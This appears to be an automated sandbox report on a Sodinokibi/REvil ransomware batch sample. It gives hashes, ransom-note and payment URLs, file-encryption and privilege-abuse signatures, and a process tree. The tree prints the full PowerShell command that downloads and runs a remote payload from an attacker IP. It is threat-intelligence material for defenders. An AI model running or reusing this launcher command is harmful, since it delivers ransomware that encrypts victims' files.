Analysis
-
max time kernel
87s -
max time network
90s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
22-08-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
148191c5edb43b691f1df387dc563507.bat
Resource
win7
Behavioral task
behavioral2
Sample
148191c5edb43b691f1df387dc563507.bat
Resource
win10v200722
General
-
Target
148191c5edb43b691f1df387dc563507.bat
-
Size
216B
-
MD5
136cfde5a2f54a7d8742d25570058e5c
-
SHA1
4c5f2992b01fa216311c261996c0ac751485f533
-
SHA256
9988e330f6441a383a3c4b89544670f2ea60dbb9c587cb938fe71dee77003391
-
SHA512
5328bc43411d7761f39c13c213cb10f6da9b81be55e8031ab77ca34fd1aeeac7d0290cd86ba0951d5f232e43fd3a738a54c601dd0c1518481750758e2611eca3
Malware Config
Extracted
http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507
Extracted
C:\30972ehjnb-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/847FCBD1B7E34899
http://decryptor.cc/847FCBD1B7E34899
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 3652 powershell.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\UnregisterDisconnect.crw => \??\c:\users\admin\pictures\UnregisterDisconnect.crw.30972ehjnb powershell.exe File renamed C:\Users\Admin\Pictures\HideResolve.crw => \??\c:\users\admin\pictures\HideResolve.crw.30972ehjnb powershell.exe File renamed C:\Users\Admin\Pictures\InstallRestart.tif => \??\c:\users\admin\pictures\InstallRestart.tif.30972ehjnb powershell.exe File renamed C:\Users\Admin\Pictures\PushUnpublish.png => \??\c:\users\admin\pictures\PushUnpublish.png.30972ehjnb powershell.exe File renamed C:\Users\Admin\Pictures\SearchCheckpoint.png => \??\c:\users\admin\pictures\SearchCheckpoint.png.30972ehjnb powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\34z4898.bmp" powershell.exe -
Drops file in Program Files directory 39 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\BlockMount.js powershell.exe File opened for modification \??\c:\program files\EditDismount.zip powershell.exe File opened for modification \??\c:\program files\SubmitPop.aifc powershell.exe File opened for modification \??\c:\program files\WatchReceive.ADT powershell.exe File opened for modification \??\c:\program files\AddInvoke.wax powershell.exe File opened for modification \??\c:\program files\CompressFind.potx powershell.exe File opened for modification \??\c:\program files\ResolveOptimize.vbe powershell.exe File opened for modification \??\c:\program files\UseWrite.mid powershell.exe File opened for modification \??\c:\program files\ClearStart.TTS powershell.exe File opened for modification \??\c:\program files\ConnectInstall.xlsm powershell.exe File opened for modification \??\c:\program files\ConvertFromRemove.edrwx powershell.exe File opened for modification \??\c:\program files\ExpandFormat.ppt powershell.exe File opened for modification \??\c:\program files\RevokeUse.css powershell.exe File opened for modification \??\c:\program files\SubmitLock.raw powershell.exe File created \??\c:\program files\30972ehjnb-readme.txt powershell.exe File opened for modification \??\c:\program files\DebugSearch.xlsx powershell.exe File opened for modification \??\c:\program files\DismountExit.xhtml powershell.exe File opened for modification \??\c:\program files\PopEnable.xlt powershell.exe File opened for modification \??\c:\program files\RemoveExport.rtf powershell.exe File opened for modification \??\c:\program files\RenameEdit.rle powershell.exe File opened for modification \??\c:\program files\SetRepair.xltm powershell.exe File opened for modification \??\c:\program files\CompareMount.pub powershell.exe File opened for modification \??\c:\program files\ConfirmEnter.tiff powershell.exe File opened for modification \??\c:\program files\DismountResume.wav powershell.exe File opened for modification \??\c:\program files\LockRestart.asf powershell.exe File opened for modification \??\c:\program files\PopExpand.clr powershell.exe File opened for modification \??\c:\program files\PopUninstall.pptm powershell.exe File opened for modification \??\c:\program files\RegisterAssert.mp3 powershell.exe File created \??\c:\program files (x86)\30972ehjnb-readme.txt powershell.exe File opened for modification \??\c:\program files\UpdateExit.xps powershell.exe File opened for modification \??\c:\program files\ApproveSubmit.doc powershell.exe File opened for modification \??\c:\program files\ClearBackup.wmv powershell.exe File opened for modification \??\c:\program files\DismountRestart.vdw powershell.exe File opened for modification \??\c:\program files\ResetStep.mp3 powershell.exe File opened for modification \??\c:\program files\ResolveRedo.otf powershell.exe File opened for modification \??\c:\program files\SetFormat.pdf powershell.exe File opened for modification \??\c:\program files\UpdateSelect.rm powershell.exe File opened for modification \??\c:\program files\ExpandUnpublish.mpeg powershell.exe File opened for modification \??\c:\program files\SuspendStart.wax powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3652 powershell.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeTakeOwnershipPrivilege 3652 powershell.exe Token: SeBackupPrivilege 1564 vssvc.exe Token: SeRestorePrivilege 1564 vssvc.exe Token: SeAuditPrivilege 1564 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3952 wrote to memory of 3652 3952 cmd.exe powershell.exe PID 3952 wrote to memory of 3652 3952 cmd.exe powershell.exe PID 3952 wrote to memory of 3652 3952 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\148191c5edb43b691f1df387dc563507.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507');Invoke-GCMRWEZUO;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1564